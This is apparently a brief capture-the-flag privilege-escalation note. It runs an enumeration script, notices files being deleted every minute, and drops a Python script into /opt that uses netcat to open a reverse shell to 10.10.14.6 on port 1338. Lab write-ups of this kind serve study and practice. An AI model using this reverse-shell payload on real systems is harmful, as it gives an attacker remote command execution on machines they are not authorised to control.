Priv Esc
./linenum -t

Noticed my scripts were getting deleted every minute
echo '#!/usr/bin/env python
echo '#!/usr/bin/env python
> import os
import os
>
> import sys
import sys
> os.system("nc 10.10.14.6 1338 -c /bin/bash")
os.system("nc 10.10.14.6 1338 -c /bin/bash")
> ' > /opt/tmp.py

Last updated
Was this helpful?